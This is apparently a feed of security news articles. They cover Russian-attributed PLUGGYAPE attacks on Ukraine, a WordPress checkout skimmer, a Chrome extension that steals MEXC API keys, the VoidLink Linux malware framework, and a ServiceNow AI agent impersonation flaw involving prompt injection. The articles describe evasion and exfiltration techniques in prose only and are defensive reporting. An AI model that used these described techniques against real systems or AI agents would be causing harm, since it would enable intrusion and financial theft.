The Computer Emergency Response Team of Ukraine (CERT-UA) has disclosed details of new cyber attacks targeting its defense forces with malware known as PLUGGYAPE between October and December 2025. The activity has been attributed with medium confidence to a Russian hacking group tracked as Void Blizzard (aka Laundry Bear or UAC-0190). The threat actor is believed to be active since at least April 2024. Attack chains distributing the malware leverage instant messaging Signal and WhatsApp as vectors, with the threat actors masquerading as charity organizations to convince targets into clicking on a seemingly-harmless link (“harthulp-ua[.]com” or “solidarity-help[.]org”) impersonating the foundation and download a password-protected archive.

The archives contain an executable created with PyInstaller that ultimately led to the deployment of PLUGGYAPE. CERT-UA said successive iterations of the backdoor have added obfuscation and anti-analysis checks to prevent the artifacts from being executed in a virtual environment. Written in Python, PLUGGYAPE establishes communication with a remote server over WebSocket or Message Queuing Telemetry Transport (MQTT), allowing the operators to execute arbitrary code on compromised hosts. Support for communication using the MQTT protocol was added in December 2025.

In addition, the command-and-control (C2) addresses are retrieved from external paste services such as rentry[.]co and pastebin[.]com, where they are stored in base64-encoded form, as opposed to directly hard-coding the domain in the malware itself. This gives attackers the ability to maintain operational security and resilience, allowing them to update the C2 servers in real-time in scenarios where the original infrastructure is detected and taken down. “Initial interaction with the target of a cyber attack is increasingly carried out using legitimate accounts and phone numbers of Ukrainian mobile operators, with the use of the Ukrainian language, audio and video communication, and the attacker may demonstrate detailed and relevant knowledge about the individual, organization, and its operations,” CERT-UA said. “Widely used messengers available on mobile devices and personal computers are de facto becoming the most common channel for delivering software tools for cyber threats.” In recent months, the cybersecurity agency has also revealed that a threat cluster tracked as UAC-0239 sent phishing emails from UKR[.]net and Gmail addresses containing links to a VHD file (or directly as an attachment) that paves the way for a Go-based stealer named FILEMESS that collects files matching certain extensions and exfiltrates them to Telegram.

Also dropped is an open-source C2 framework called OrcaC2 that enables system manipulation, file transfer, keylogging, and remote command execution. The activity is said to have targeted Ukrainian defense forces and local governments. Educational institutions and state authorities in Ukraine have also been at the receiving end of another spear-phishing campaign orchestrated by UAC-0241 that leverages ZIP archives containing a Windows shortcut (LNK) file, opening which triggers the execution of an HTML Application (HTA) using “mshta.exe.” The HTA payload, in turn, launches JavaScript designed to download and execute a PowerShell script, which then delivers an open-source tool called LaZagne to recover stored passwords and a Go backdoor codenamed GAMYBEAR that can receive and execute incoming commands from a server and transmit the results back in Base64-encoded form over HTTP. Found this article interesting?

Long-Running Web Skimming Campaign Steals Credit Cards From Online Checkout Pages

Cybersecurity researchers have discovered a major web skimming campaign that has been active since January 2022, targeting several major payment networks like American Express, Diners Club, Discover, JCB Co., Ltd., Mastercard, and UnionPay. “Enterprise organizations that are clients of these payment providers are the most likely to be impacted,” Silent Push said in a report published today. Digital skimming attacks refer to a category of client-side attacks in which bad actors compromise legitimate e-commerce sites and payment portals to inject malicious JavaScript code that’s capable of stealthily harvesting credit card information and other personal information when unsuspecting users attempt to make a payment on checkout pages. These attacks are classified under an umbrella term called Magecart , which initially referred to a coalition of cybercriminal groups that targeted e-commerce sites using the Magento software, before diversifying to other products and platforms.

Silent Push said it discovered the campaign after analyzing a suspicious domain linked to a now-sanctioned bulletproof hosting provider Stark Industries (and its parent company PQ.Hosting), which has since rebranded to THE[.]Hosting, under the control of the Dutch entity WorkTitans B.V., as a sanctions evasion measure. The domain in question, cdn-cookie[.]com, has been found to host highly obfuscated JavaScript payloads (e.g., “recorder.js” or “tab-gtm.js”) that are loaded by web shops to facilitate credit card skimming. The skimmer comes with features to evade detection by site administrators. Specifically, it checks the Document Object Model (DOM) tree for an element named “ wpadminbar ,” a reference to a toolbar that appears in WordPress websites when logged-in administrators or users with appropriate permissions are viewing the site.

In the event the “wpadminbar” element is present, the skimmer initiates a self-destruct sequence and removes its own presence from the web page. An attempt to execute the skimmer is made every time the web page’s DOM is modified, a standard behavior that occurs when users interact with the page. That’s not all. The skimmer also checks to see if Stripe was selected as a payment option, and if so, there exists an element called “wc_cart_hash” in the browser’s localStorage , which it creates and sets to “true” to indicate that the victim has already been successfully skimmed.

The absence of this flag causes the skimmer to render a fake Stripe payment form that replaces the legitimate form through user interface manipulations, thereby tricking the victims into entering their credit card numbers, along with the expiration dates and Card Verification Code (CVC) numbers. “As the victim entered their credit card details into a fake form instead of the real Stripe payment form, which was initially hidden by the skimmer when they initially filled it out, the payment page will display an error,” Silent Push said. “This makes it appear as if the victim had simply entered their payment details incorrectly.” The data stolen by the skimmer extends beyond payment details to include names, phone numbers, email addresses, and shipping addresses. The information is eventually exfiltrated by means of an HTTP POST request to the server “lasorie[.]com.” Once the data transmission is complete, the skimmer erases traces of itself from the checkout page, removing the fake payment form that was created and restoring the legitimate Stripe input form.

It then sets “wc_cart_hash” to “true” to prevent the skimmer from being run a second time on the same victim. “This attacker has advanced knowledge of WordPress’s inner workings and integrates even lesser-known features into their attack chain,” Silent Push said. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Malicious Chrome Extension Steals MEXC API Keys by Masquerading as Trading Tool

Cybersecurity researchers have disclosed details of a malicious Google Chrome extension that’s capable of stealing API keys associated with MEXC, a centralized cryptocurrency exchange (CEX) available in over 170 countries , while masquerading as a tool to automate trading on the platform. The extension, named MEXC API Automator (ID: pppdfgkfdemgfknfnhpkibbkabhghhfh), has 29 downloads and is still available on the Chrome Web Store as of writing. It was first published on September 1, 2025, by a developer named “jorjortan142.” “The extension programmatically creates new MEXC API keys, enables withdrawal permissions, hides that permission in the user interface (UI), and exfiltrates the resulting API key and secret to a hardcoded Telegram bot controlled by the threat actor,” Socket security researcher Kirill Boychenko said in an analysis. According to the Chrome Web Store listing, the web browser add-on is described as an extension that “simplifies connecting your trading bot to the MEXC exchange” by generating the API keys with the necessary permissions on the management page, including to facilitate trading and withdrawals.

In doing so, the installed extension enables a threat actor to control any MEXC account accessed from the compromised browser, allowing them to execute trades, perform automated withdrawals, and even drain the wallets and balances reachable through the service. “In practice, as soon as the user navigates to MEXC’s API management page, the extension injects a single content script, script.js, and begins operating inside the already authenticated MEXC session,” Socket added. To achieve this, the extension checks if the current URL contains the string “/user/openapi,” which refers to the API key management page . The script then programmatically creates a new API key and ensures that withdrawal capability is enabled.

At the same time, it tampers with the page’s user interface to give the impression to the user that the withdrawal permission has been disabled. As soon as the process to generate the Access Key and Secret Key is complete, the script extracts both the values and transmits them to a hard-coded Telegram bot under the threat actor’s control using an HTTPS POST request. The threat poses a severe risk, as it remains active as long as the keys are valid and not revoked, granting the attackers unfettered access to the victim’s account even if they end up uninstalling the extension from the Chrome browser. “In effect, the threat actor uses the Chrome Web Store as the delivery mechanism, the MEXC web UI as the execution environment, and Telegram as the exfiltration channel,” Boychenko noted.

“The result is a purpose-built credential-stealing extension that targets MEXC API keys at the moment they are created and configured with full permissions.” The attack is made possible by the fact that it leverages an already authenticated browser session to realize its goals, thereby obviating the need for obtaining a user’s password or bypassing authentication protections. It’s currently not clear who is behind the operation, but a reference to “jorjortan142” points to an X handle with the same name that links to a Telegram bot named SwapSushiBot, which is also promoted across TikTok and YouTube . The YouTube channel was created on August 17, 2025. “By hijacking a single API workflow inside the browser, threat actors can bypass many traditional controls and go straight for long lived API keys with withdrawal rights,” Socket said.

“The same playbook can be readily adapted to other exchanges, DeFi dashboards, broker portals, and any web console that issues tokens in session, and future variants are likely to introduce heavier obfuscation, request broader browser permissions, and bundle support for multiple platforms into a single extension.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

[Webinar] Securing Agentic AI: From MCPs and Tool Access to Shadow API Key Sprawl

AI agents are no longer just writing code. They are executing it. Tools like Copilot, Claude Code, and Codex can now build, test, and deploy software end-to-end in minutes. That speed is reshaping engineering—but it’s also creating a security gap most teams don’t see until something breaks.

Behind every agentic workflow sits a layer few organizations are actively securing: Machine Control Protocols (MCPs) . These systems quietly decide what an AI agent can run, which tools it can call, which APIs it can access, and what infrastructure it can touch. Once that control plane is compromised or misconfigured, the agent doesn’t just make mistakes—it acts with authority. Ask the teams impacted by CVE-2025-6514 .

One flaw turned a trusted OAuth proxy used by more than 500,000 developers into a remote code execution path. No exotic exploit chain. No noisy breach. Just automation doing exactly what it was allowed to do—at scale.

That incident made one thing clear: if an AI agent can execute commands, it can also execute attacks. This webinar is for teams who want to move fast without giving up control. Secure your spot for the live session ➜ Led by the author of the OpenID whitepaper Identity Management for Agentic AI , this session goes straight to the core risks security teams are now inheriting from agentic AI adoption. You’ll see how MCP servers actually work in real environments, where shadow API keys appear, how permissions quietly sprawl, and why traditional identity and access models break down when agents act on your behalf.

You’ll learn: What MCP servers are and why they matter more than the model itself How malicious or compromised MCPs turn automation into an attack surface Where shadow API keys come from—and how to detect and eliminate them How to audit agent actions and enforce policy before deployment Practical controls to secure agentic AI without slowing development Agentic AI is already inside your pipeline. The only question is whether you can see what it’s doing—and stop it when it goes too far. Register for the live webinar and regain control of your AI stack before the next incident does it for you. Register for the Webinar ➜ Found this article interesting?

This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

New Advanced Linux VoidLink Malware Targets Cloud and container Environments

Cybersecurity researchers have disclosed details of a previously undocumented and feature-rich malware framework codenamed VoidLink that’s specifically designed for long-term, stealthy access to Linux-based cloud environments According to a new report from Check Point Research, the cloud-native Linux malware framework comprises an array of custom loaders, implants, rootkits, and modular plugins that enable its operators to augment or change its capabilities over time, as well as pivot when objectives change. It was first discovered in December 2025. “The framework includes multiple cloud-focused capabilities and modules, and is engineered to operate reliably in cloud and container environments over extended periods,” the cybersecurity company said in an analysis published today. “VoidLink’s architecture is extremely flexible and highly modular, centered around a custom Plugin API that appears to be inspired by Cobalt Strike’s Beacon Object Files (BOF) approach.

This API is used in more than 30+ plug-in modules available by default.” The findings reflect a shift in threat actors’ focus from Windows to Linux systems that have emerged as the bedrock of cloud services and critical operations. Actively maintained and evolving, VoidLink is assessed to be the handiwork of China-affiliated threat actors. A cloud-first implant written in the Zig programming language, the toolkit can detect major cloud environments, viz. Amazon Web Services (AWS), Google Cloud, Microsoft Azure, Alibaba, and Tencent, and adapt its behavior if it recognizes that it’s running within a Docker container or a Kubernetes pod.

It can also gather credentials associated with cloud environments and popular source code version control systems such as Git. VoidLink High Level Overview The targeting of these services is an indication that VoidLink is likely engineered to target software developers, either with an intent to steal sensitive data or leverage the access to conduct supply chain attacks. Some of its other capabilities are listed below - Rootkit-like features using LD_PRELOAD , loadable kernel module ( LKM ), and eBPF to hide its processes based on the Linux kernel version An in-memory plugin system for extending functionality Support for varied command-and-control (C2) channels, such as HTTP/HTTPS, WebSocket, ICMP, and DNS tunneling Form a peer-to-peer (P2P) or mesh-style network between compromised hosts A Chinese web-based dashboard that allows the attackers to remotely control the implant, create bespoke versions on the fly, manage files, tasks, and plugins, and carry out different stages of the attack cycle right from reconnaissance and persistence to lateral movement and defense evasion by wiping traces of malicious activity. Builder Panel to Create Customized Versions of VoidLink VoidLink supports 37 plugins that span anti-forensics, reconnaissance, containers, privilege escalation, lateral movement, and other, transforming it into a full-fledged post-exploitation framework - Anti-forensics, to wipe or edit logs and shell history based on keywords and perform timestomping of files to hinder analysis Cloud, to facilitate Kubernetes and Docker discovery and privilege-escalation, container escapes, and probes for misconfigurations Credential harvesting, to collect credentials and secrets, including SSH keys, git credentials, local password material, browser credentials and cookies, tokens, and API keys Lateral movement, to spread laterally using an SSH-based worm Persistence, to help establish persistence via dynamic linker abuse, cron jobs, and system services Recon, to gather detailed system and environment information Describing it as “impressive” and “far more advanced than typical Linux malware,” Check Point said VoidLink features a core orchestrator component that handles C2 communications and task execution.

It also incorporates a bevy of anti-analysis features to circumvent detection. Besides flagging various debuggers and monitoring tools, it can delete itself if any signs of tampering are detected. It also features a self-modifying code option that can decrypt protected code regions at runtime and encrypt them when not in use, bypassing runtime memory scanners. What’s more, the malware framework enumerates installed security products and hardening measures on the compromised host to calculate a risk score and arrive at an evasion strategy across the board.

For example, this may involve slowing down port scans and having greater control in high-risk environments. “The developers demonstrate a high level of technical expertise, with strong proficiency across multiple programming languages, including Go, Zig, C, and modern frameworks such as React,” Check Point noted. “In addition, the attacker possesses in-depth knowledge of sophisticated operating system internals, enabling the development of advanced and complex solutions.” “VoidLink aims to automate evasion as much as possible, profiling an environment and choosing the most suitable strategy to operate in it. Augmented by kernel mode tradecraft and a vast plugin ecosystem, VoidLink enables its operators to move through cloud environments and container ecosystems with adaptive stealth.” Found this article interesting?

What Should We Learn From How Attackers Leveraged AI in 2025?

Old Playbook, New Scale: While defenders are chasing trends, attackers are optimizing the basics The security industry loves talking about “new” threats. AI-powered attacks. Quantum-resistant encryption. Zero-trust architectures.

But looking around, it seems like the most effective attacks in 2025 are pretty much the same as they were in 2015. Attackers are exploiting the same entry points that worked - they’re just doing it better. Supply Chain: Still Cascading Downstream As the Shai Hulud NPM campaign showed us, supply chain remains a major issue. A single compromised package can cascade through an entire dependency tree, affecting thousands of downstream projects.

The attack vector hasn’t changed. What’s changed is how efficiently attackers can identify and exploit opportunities. AI has collapsed the barrier to entry. Just as AI has enabled one-person software projects to build sophisticated applications, the same is true in cybercrime.

What used to require large, organized operations can now be executed by lean teams, even individuals. We suspect some of these NPM package attacks, including Shai-Hulud, might actually be one-person operations. As software projects become simpler to develop, and threat actors show an ability to play the long game (as with the XZ Utils attack) - we’re likely to see more cases where attackers publish legitimate packages that build trust over time, then one day, with the click of a button, inject malicious capabilities to all downstream users. Phishing: Still Just One Click Away Phishing still works for the same reason it always has: humans remain the weakest link.

But the stakes have changed dramatically. The recent npm supply chain attack demonstrates the ripple effect: one developer clicked a bad link, entered his credentials and his account was compromised. Packages with tens of millions of weekly downloads were poisoned. Despite the developer publicly reporting the incident to npm, mitigation took time - and during that window, the attack spread at scale.

Official Stores: Still Not Safe Perhaps most frustrating: malware continues to bypass official gatekeepers. Our research on malicious Chrome extensions stealing ChatGPT and DeepSeek conversations revealed something we already know from mobile app stores—automated reviews and human moderators aren’t keeping pace with attacker sophistication. The permissions problem should sound familiar because it’s already been solved. Android and iOS give users granular control: you can allow location access but block the microphone, permit camera access only when an app is open, not in the background.

Chrome could implement the same model for extensions - the technology exists. It’s a matter of prioritization and implementation. Instead, users face a binary choice with extensions requesting permission to “read information from all websites.” If an extension asks for that level of access, in most cases it will be used for malicious purposes, or it will later be updated to do so. Attackers don’t have the Shiny Tool Syndrome Attackers didn’t throw out their playbook when AI arrived - they automated it.

They’re still exploiting supply chains, phishing developers, and sneaking malware past reviewers. They’re just doing it with one-tenth the resources. We shouldn’t be chasing shiny new defense strategies while the basics still don’t work. Fix permissions models.

Harden supply chain verification. Make phishing-resistant authentication the default. The fundamentals matter more now, not less. Attackers optimized the basics.

What should defenders prioritize? Join OX for our upcoming webinar: Threat Intelligence Update: What’s Been Working for Hackers and What Have the Good Guys Been Doing? We’ll cover attack techniques gaining traction, what’s actually stopping them, and what to prioritize when resources are limited. Register here.

Register here. Note: This article was exclusively written and contributed by Moshe Siman Tov Bustan , Security Research Team Lead at OX. Found this article interesting? This article is a contributed piece from one of our valued partners.

ServiceNow Patches Critical AI Platform Flaw Allowing Unauthenticated User Impersonation

ServiceNow has disclosed details of a now-patched critical security flaw impacting its ServiceNow artificial intelligence (AI) Platform that could enable an unauthenticated user to impersonate another user and perform arbitrary actions as that user. The vulnerability, tracked as CVE-2025-12420 , carries a CVSS score of 9.3 out of 10.0. It has been codenamed BodySnatcher by AppOmni. “This issue […] could enable an unauthenticated user to impersonate another user and perform the operations that the impersonated user is entitled to perform,” the company said in an advisory released Monday.

The shortcoming was addressed by ServiceNow on October 30, 2025, by deploying a security update to the majority of hosted instances, with the company also sharing the patches with ServiceNow partners and self-hosted customers. The following versions include a fix for CVE-2025-12420 - Now Assist AI Agents (sn_aia) - 5.1.18 or later and 5.2.19 or later Virtual Agent API (sn_va_as_service) - 3.15.2 or later and 4.0.4 or later ServiceNow credited Aaron Costello, chief of SaaS Security Research at AppOmni, with discovering and reporting the flaw in October 2025. While there is no evidence that the vulnerability has been exploited in the wild, users are advised to apply an appropriate security update as soon as possible to mitigate potential threats. “BodySnatcher is the most severe AI-driven vulnerability uncovered to date: Attackers could have effectively ‘remote controlled’ an organization’s AI, weaponizing the very tools meant to simplify the enterprise,” Costello told The Hacker News.

In a separate report, AppOmni said the Virtual Agent integration flaw allows unauthenticated attackers to impersonate any ServiceNow user using only an email address, bypassing multi-factor authentication (MFA) and single sign-on (SSO) protections. Successful exploitation could allow a threat actor to impersonate an administrator and execute an AI agent to subvert security controls and create backdoor accounts with elevated privileges. “By chaining a hardcoded, platform-wide secret with account-linking logic that trusts a simple email address, an attacker can bypass multi-factor authentication (MFA), single sign-on (SSO), and other access controls,” Costello added . “And it’s the most severe AI-driven security vulnerability uncovered to date.

With these weaknesses linked together, the attacker can remotely drive privileged agentic workflows as any user.” The disclosure comes nearly two months after AppOmni revealed that malicious actors can exploit default configurations in ServiceNow’s Now Assist generative AI platform and leverage its agentic capabilities to conduct second-order prompt injection attacks. The issue could then be weaponized to execute unauthorized actions, enabling attackers to copy and exfiltrate sensitive corporate data, modify records, and escalate privileges. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.